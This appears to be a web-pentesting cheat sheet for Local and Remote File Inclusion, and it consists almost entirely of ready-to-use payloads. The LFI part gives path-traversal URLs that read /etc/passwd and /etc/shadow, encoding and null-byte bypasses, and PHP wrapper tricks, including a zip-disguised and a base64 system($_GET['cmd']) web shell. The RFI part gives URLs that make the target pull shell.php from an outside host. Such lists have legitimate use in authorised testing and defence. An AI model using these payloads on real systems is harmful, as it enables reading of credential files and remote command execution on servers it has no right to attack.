LFI & RFI

LFI

Where to find

• Any endpoint that includes a file from a web server. For example, /index.php?page=index.html

How to exploit

1. Basic payload

http://example.com/index.php?page=../../../etc/passwd
http://example.com/index.php?page=../../../../../../../../../../../../etc/shadow
http://example.com/index.php?page=..././..././..././..././..././etc/shadow

1. URL encoding

http://example.com/index.php?page=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

1. Double encoding

http://example.com/index.php?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd

1. UTF-8 encoding

http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

1. Using Null Byte (%00)

http://example.com/index.php?page=../../../etc/passwd%00
http://example.com/index.php?page=../../../etc/passwd%00.png #any (jpg...etc) 

1. From an existent folder

http://example.com/index.php?page=scripts/../../../../../etc/passwd

1. Path truncation

http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
http://example.com/index.php?page=/var/www/html/../../../etc/passwd

1. Using PHP Wrappers: filter

http://example.com/index.php?page=php://filter/read=string.rot13/resource=config.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=config.php

1. Using PHP Wrappers: zlib

http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/shadow

1. Using PHP Wrappers: zip

echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php

http://example.com/index.php?page=zip://shell.jpg%23payload.php

1. Using PHP Wrappers: data

http://example.com/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+

1. Using PHP Wrappers: expect

http://example.com/index.php?page=expect://ls

1. Using PHP Wrappers: input

POST /index.php?page=php://input&cmd=ls HTTP/1.1
Host: example.com
...

<?php echo shell_exec($_GET['cmd']); ?>

1. Some unique bypass

http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
http://example.com/index.php?page=/.%2e/.%2e/.%2e/.%2e/etc/passwd
http://example.com/index.php?page=/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd

RFI

Where to find

• Any endpoint that includes a file from a web server. For example, /index.php?page=index.html

How to exploit

1. Basic payload

http://example.com/index.php?page=http://daffa.info/shell.php

1. URL encoding

http://example.com/index.php?page=http%3A%2F%2Fdaffa.info%2Fshell.php

1. Double encoding

http://example.com/index.php?page=http%253A%252F%252Fdaffa.info%252Fshell.php

1. Using Null Byte (%00)

http://example.com/index.php?page=http://daffa.info/shell.php%00